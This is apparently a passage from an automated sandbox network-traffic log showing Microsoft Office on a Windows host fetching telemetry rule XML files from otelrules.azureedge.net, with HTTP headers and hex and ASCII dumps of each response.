                                          x-ms-request-id: f0850b4c-401e-005b-0318-379c0c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224506Z-164f84587bfn7ppchC1DFW45b400000000w000000000bhuq
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:06 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          137192.168.2.45741613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:06 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:06 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:06 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1403
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                          ETag: "0x8DC582BDC2EEE03"
                                          x-ms-request-id: 555572e6-d01e-00a1-5509-3735b1000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224506Z-16547b76f7fhv4d5hC1DFW7h0n00000004q000000000z0d9
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:06 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          138192.168.2.45741713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:06 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:06 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:06 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1366
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                          ETag: "0x8DC582BEA414B16"
                                          x-ms-request-id: 1573d8a3-d01e-002b-769d-3725fb000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224506Z-16547b76f7fwm7vghC1DFW900s00000003wg000000013kq0
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:06 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          139192.168.2.45741813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:06 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:07 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:06 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1399
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                          ETag: "0x8DC582BE1CC18CD"
                                          x-ms-request-id: f96acd97-a01e-000d-6d86-36d1ea000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224506Z-164f84587bfjxw6fhC1DFWq94400000006g000000000xbns
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:07 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          140192.168.2.45741913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:07 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:07 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:07 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1362
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                          ETag: "0x8DC582BEB256F43"
                                          x-ms-request-id: bb729275-001e-0014-2109-375151000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224507Z-16547b76f7fz92z5hC1DFWmdx800000004pg00000000r4r4
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:07 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          141192.168.2.45742013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:07 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:07 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:07 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1403
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                          ETag: "0x8DC582BEB866CDB"
                                          x-ms-request-id: 4f7b6165-401e-0078-36c3-374d34000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224507Z-16547b76f7fwm7vghC1DFW900s00000003xg00000000z67v
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:07 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          142192.168.2.45742113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:07 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:07 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:07 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1366
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                          ETag: "0x8DC582BE5B7B174"
                                          x-ms-request-id: 902a0e4e-401e-000a-237c-374a7b000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224507Z-17cf5b775c4dj7lnhC1DFWmqrg00000000h0000000002yby
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:07 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          143192.168.2.45742213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:07 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:07 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:07 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1399
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                          ETag: "0x8DC582BE976026E"
                                          x-ms-request-id: cfc1385c-801e-0083-58d2-37f0ae000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224507Z-16547b76f7f6892shC1DFWawd000000003d000000000k165
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:07 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          144192.168.2.45742313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:07 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:08 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:08 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1362
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                          ETag: "0x8DC582BDC13EFEF"
                                          x-ms-request-id: d7b14c3d-501e-0047-0581-37ce6c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224508Z-1866b5c5fbbr78bbhC1DFWqz2n00000006gg00000000rqcr
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:08 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          145192.168.2.45742413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:08 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:08 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:08 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1425
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                          ETag: "0x8DC582BE6BD89A1"
                                          x-ms-request-id: 454d907e-001e-00ad-0609-37554b000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224508Z-16547b76f7fwm7vghC1DFW900s00000003yg00000000u5qx
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:08 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          146192.168.2.45742513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:08 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:08 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:08 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1388
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                          ETag: "0x8DC582BDBD9126E"
                                          x-ms-request-id: 0261770d-d01e-002b-1caf-3625fb000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224508Z-1866b5c5fbbbf2bdhC1DFWu6f400000003k0000000002qrh
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:08 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          147192.168.2.45742613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:08 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:08 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:08 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1415
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                          ETag: "0x8DC582BE7C66E85"
                                          x-ms-request-id: 83fa2191-701e-0098-599e-37395f000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224508Z-16547b76f7fljddfhC1DFWeqbs000000074g000000012yq2
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
